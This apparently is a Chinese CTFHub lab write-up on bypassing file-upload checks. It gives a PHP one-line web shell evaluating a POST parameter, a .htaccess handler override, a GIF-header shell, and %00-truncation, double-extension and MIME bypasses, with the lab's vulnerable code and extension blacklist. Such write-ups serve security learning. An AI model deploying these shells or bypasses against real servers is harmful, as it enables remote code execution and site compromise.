靶场实战 CTFHub

CTFHub Web 文件上传

CTFHub Web 文件上传

Posted by Kyon-H on July 2, 2025

1. 文件上传

1.1. 无验证

构造一句话木马 shell.php

1

<?php echo 123;@eval($_POST['code']);?>

上传成功

image

image

蚁剑获取到 flag 文件

image

1.2. 前端验证

上传 shell.php.jpg bp 抓包修改后缀,上传成功,蚁剑连接

image

1.3. .htaccess

创建 .htaccess 文件上传

1
2
3

<FilesMatch "wshell">
Sethandler application/x-httpd-php
</FilesMatch>

上传 shell.gif 木马

代码成功执行

image

image

1.4. MIME 绕过

上传 shell.php.jpg bp 抓包修改后缀,上传成功,蚁剑连接

image

1.5. 00 截断

检查发现代码,文件路径由 get 提交的 road 和随机数、时间、后缀组成

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

if (!empty($_POST['submit'])) {
    $name = basename($_FILES['file']['name']);
    $info = pathinfo($name);
    $ext = $info['extension'];
    $whitelist = array("jpg", "png", "gif");
    if (in_array($ext, $whitelist)) {
        $des = $_GET['road'] . "/" . rand(10, 99) . date("YmdHis") . "." . $ext;
        if (move_uploaded_file($_FILES['file']['tmp_name'], $des)) {
            echo "<script>alert('上传成功')</script>";
        } else {
            echo "<script>alert('上传失败')</script>";
        }
    } else {
        echo "文件类型不匹配";
    }
}

%00 截断 road 参数,上传成功

image

image

image

1.6. 双写后缀

代码发现字符替换函数,双写绕过

1
2
3

$name = basename($_FILES['file']['name']);
$blacklist = array("php", "php5", "php4", "php3", "phtml", "pht", "jsp", "jspa", "jspx", "jsw", "jsv", "jspf", "jtml", "asp", "aspx", "asa", "asax", "ascx", "ashx", "asmx", "cer", "swf", "htaccess", "ini");
$name = str_ireplace($blacklist, "", $name);

上传 shell.pphphp 成功,蚁剑

image

1.7. 文件头检查

上传 shell.php.gif bp 抓包修改后缀,

1
2

GIF89a
<?php echo 123;@eval($_POST['code']);?>

上传成功,蚁剑连接

image

CATALOG
    FEATURED TAGS
    DVWA 靶场实战 Vulnhub DC系列 服务器 CTFHub Ubuntu 内网防护